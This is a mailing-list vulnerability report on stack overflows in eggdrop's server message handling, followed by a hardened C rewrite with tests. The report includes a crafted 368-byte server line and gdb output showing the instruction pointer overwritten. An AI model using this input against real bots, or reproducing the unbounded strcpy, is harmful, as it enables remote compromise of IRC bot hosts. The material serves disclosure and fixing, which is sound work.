Bugs: server module buffer overflows

Forever B0rked forever.b0rked at gmail.com
Sun Apr 15 15:48:50 CST 2007


I was taking a quick look at some of the code behind the eggie modules and I
ran across a few stack-based overflows. I am incredibly surprised that no
one has reported these yet.

It seems that you are relying on the fact that the server the bot is
connected to is sane and not malicious, but I was able to exploit these
flaws by opening a netcat listener and connecting the bot to it, then
sending whatever string I needed to.

For example:

static int gotmsg(char *from, char *msg)
{
  char *to, buf[UHOSTLEN], *nick, ctcpbuf[512], *uhost = buf, *ctcp,
       *p, *p1, *code;

........

  ignoring = match_ignore(from);
  to = newsplit(&msg);
  fixcolon(msg);
  /* Only check if flood-ctcp is active */
  strcpy(uhost, from);

By sending the following string:

:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAABBBB PRIVMSG Lamestbot :test

(that's 368 bytes)

gdb output:

Program received signal SIGSEGV, Segmentation fault.
[Switching to process 14990]
0x42424242 in ?? ()
(gdb) i r $eip
eip            0x42424242       0x42424242

You overwrite the instruction pointer with 0x42424242. It should be obvious
that this could allow remote code execution as well. I didn't spend too much
time looking at the rest of the code, this just happened to catch my eye
while I was glancing over it. I did notice a few others that were along the
same lines as this, but I didn't test them or document them, although I
would be happy to do so if you want more information.

Given the fact that you have to convince someone to connect to a malicious
server, this isn't -THAT- serious, but if someone had the proper console
permissions or was able to coerce someone to connect their eggdrop to a
malicious server, then it could result in a compromise.

If you have any other questions then please let me know. I might go through
the rest of the code in greater depth later, but I don't have the time right
now.
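The defect reported above is an unbounded strcpy() of the server-supplied prefix into a fixed-size stack buffer. The following is an added example, not eggdrop's own code: it models the same shape of handler (a prefix taken from a ":prefix PRIVMSG ..." line and copied into a UHOSTLEN-sized buffer) and replaces the strcpy() with a length-checked copy that rejects a prefix that does not fit instead of writing past the buffer. The UHOSTLEN value, the frame struct with guard bytes, and the function names are assumptions made for this illustration; the guard bytes exist only so the demo can show that the buffer's neighbours are untouched.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size for this illustration; the real UHOSTLEN lives in the project's headers. */
#define UHOSTLEN 160

/* Guard bytes on both sides of the buffer stand in for the saved registers and
 * return address that an overflowing strcpy() would otherwise clobber. */
struct frame {
    char guard_lo[16];
    char buf[UHOSTLEN];
    char guard_hi[16];
};

static void init_frame(struct frame *f)
{
    memset(f->guard_lo, 0xAA, sizeof f->guard_lo);
    memset(f->buf, 0, sizeof f->buf);
    memset(f->guard_hi, 0xAA, sizeof f->guard_hi);
}

static int guards_intact(const struct frame *f)
{
    for (size_t i = 0; i < sizeof f->guard_lo; i++)
        if (f->guard_lo[i] != (char)0xAA || f->guard_hi[i] != (char)0xAA)
            return 0;
    return 1;
}

/* Hardened replacement for "strcpy(uhost, from)": copy srclen bytes of src into
 * dst only if they fit together with the terminating NUL. A prefix that does not
 * fit is rejected (dst left empty, -1 returned) rather than silently truncated,
 * because a truncated user@host could match the wrong ignore/ban entry. */
static int copy_uhost_bounded(char *dst, size_t dstsize, const char *src, size_t srclen)
{
    if (dstsize == 0 || srclen >= dstsize) {
        if (dstsize)
            dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, srclen);
    dst[srclen] = '\0';
    return 0;
}

/* Minimal stand-in for the message handler: extract the ":prefix" token and copy it.
 * Returns 0 on success, -1 if the prefix was rejected, -2 if the line is malformed. */
static int handle_server_line(const char *line, struct frame *f)
{
    if (line[0] != ':')
        return -2;
    const char *from = line + 1;
    size_t fromlen = strcspn(from, " ");
    if (fromlen == 0 || from[fromlen] != ' ')
        return -2;
    return copy_uhost_bounded(f->buf, sizeof f->buf, from, fromlen);
}

/* Constructed input of the same shape as the report's: 364 'A' + "BBBB" as the
 * prefix (368 bytes), followed by the PRIVMSG tail. Returns 1 if the handler
 * rejected it and left both guard regions untouched. */
static int demo_overlong_prefix(void)
{
    char line[512];
    struct frame f;
    init_frame(&f);
    memset(line, 'A', 365);
    line[0] = ':';
    memcpy(line + 365, "BBBB PRIVMSG Lamestbot :test", sizeof "BBBB PRIVMSG Lamestbot :test");
    int rc = handle_server_line(line, &f);
    return rc == -1 && guards_intact(&f) && f.buf[0] == '\0';
}

/* Constructed well-formed line: the prefix fits and is copied verbatim. */
static int demo_normal_prefix(void)
{
    struct frame f;
    init_frame(&f);
    int rc = handle_server_line(":nick!user@host PRIVMSG Lamestbot :test", &f);
    return rc == 0 && guards_intact(&f) && strcmp(f.buf, "nick!user@host") == 0;
}

int main(void)
{
    printf("overlong prefix rejected, guards intact: %d\n", demo_overlong_prefix());
    printf("normal prefix copied, guards intact:     %d\n", demo_normal_prefix());
    return 0;
}
```

The same bounded copy applies to every other strcpy()/sprintf() of server-controlled data into a fixed buffer in the module; the essential property is that the destination size, not the source length, decides how many bytes are written.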


